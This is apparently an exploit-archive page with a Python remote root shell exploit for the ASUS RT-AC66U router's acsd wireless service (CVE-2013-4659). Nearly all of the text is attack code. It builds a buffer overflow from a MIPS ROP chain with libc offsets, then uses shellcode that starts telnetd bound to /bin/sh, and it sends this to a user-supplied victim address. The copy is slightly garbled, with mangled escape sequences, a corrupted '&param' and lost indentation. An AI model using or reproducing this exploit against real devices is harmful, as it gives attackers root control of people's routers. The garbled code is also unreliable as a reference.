[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ASUS RT-AC66U acsd Param - Remote Root Shell Exploit
# Published : 2013-07-27
# Author :
# Previous Title : nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
# Next Title : Ultra Mini HTTPD 1.21 - Stack Buffer Overflow
#!/usr/bin/env python
import signal, struct
from time import sleep
from socket import *
from sys import exit, exc_info
#
# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
# Discovered and Reported*June 2013
# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
# *Security Analsyts @ Independent Security Evaluators
# Software Vendor*********http://asus.com
# Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/
# Software****************acsd wireless service (Listens on TCP/5916)
# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable)
# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
#
# Overview:
# The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
# Buffer Overflow attacks.
#
# Multiple overflows exist in the following software:
#
# - Broadcom acsd - Wireless Channel Service (autochannel¶m, autochannel&data, csscan&ifname commands)
#
def sigHandle(signum, frm): # Signal handler
print "n[!!!] Cleaning up the exploit... [!!!]n"
sleep(1)
exit(0)
def targServer():
while True:
try:
server = inet_aton(raw_input("n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:nn>"))
server = inet_ntoa(server)
break
except:
print "nn[!!!] Error: Please enter a valid IPv4 address. [!!!]nn"
sleep(1)
continue
return server
def main():
print ("""n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
[*] Discovered and Reported: June 2013
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE
[*] Software Vendor: http://asus.com
[*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
[*] Software: acsd wireless service (Listens on TCP/5916)
[*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)
[*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659n""")
signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
victim = targServer()
port = int(5916)
acsdCmd = "autochannel¶m=" #Vulnerable command - JH
# base address of .text section of libc.so.0 in acsd's address space
libc_base = 0x2ab25000
# ROP gadget #1
# lui s0,0x2
# li a0,1
# move t9,s1
# jalr t9
# ori a1,s0,0x2
ra1 = struct.pack("<L", libc_base + 0x2d39c)
# ROP gadget #2
# move t9,s3
# lw ra,44(sp)
# lw s4,40(sp)
# lw s3,36(sp)
# lw s2,32(sp)
# lw s1,28(sp)
# lw s0,24(sp)
# jr t9
s1 = struct.pack("<L", libc_base + 0x34358)
# sleep() - used to force program context switch (cache flush)
s3 = struct.pack("<L", libc_base + 0x2cb90)
# ROP gadget #3
# addiu a1,sp,24
# lw gp,16(sp)
# lw ra,32(sp)
# jr ra
# addiu sp,sp,40
ra2 = struct.pack("<L", libc_base + 0xa1b0)
# ROP gadget #4
# move t9,a1
# addiu a0,a0,56
# jr t9
# move a1,a2
ra3 = struct.pack("<L", libc_base + 0x3167c)
# jalr sp
jalr_sp = "x09xf8xa0x03"
JuNk = "x42" * 510
safeNop = "2Aa3"
#80 Bytes system() Shellcode by Jacob Holcomb of ISE
#Calling system() and executing telnetd -l /bin/sh
shellcode = "x6cx6ex08x3cx74x65x08x35xecxffxa8"
shellcode += "xafx64x20x09x3cx65x74x29x35xf0xff"
shellcode += "xa9xafx20x2fx0ax3cx2dx6cx4ax35xf4"
shellcode += "xffxaaxafx6ex2fx0bx3cx62x69x6bx35"
shellcode += "xf8xffxabxafx73x68x0cx24xfcxffxac"
shellcode += "xafxecxffxa4x23xecxffxbdx23xb4x2a"
shellcode += "x19x3cx50xf0x39x37x09xf8x20x03x32"
shellcode += "x41x61x33"
sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
sploit += safeNop + shellcode
try:
print "n [*] Creating network socket."
net_sock = socket(AF_INET, SOCK_STREAM)
except:
print "n [!!!] There was an error creating the network socket. [!!!]nn%sn" % exc_info()
sleep(1)
exit(0)
try:
print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
net_sock.connect((victim, port))
except:
print "n [!!!] There was an error connecting to %s. [!!!]nn%sn" % (victim, exc_info())
sleep(1)
exit(0)
try:
print """ [*] Attempting to exploit the acsd param command.
[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
[*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
net_sock.send(sploit)
sleep(1)
except:
print "n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]nn%sn" % (victim, exc_info())
sleep(1)
exit(0)
try:
print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.n"""
net_sock.close()
except:
print "n [!!!] There was an error closing the network socket. [!!!]nn%sn" % exc_info()
sleep(1)
exit(0)
if __name__ == "__main__":
main()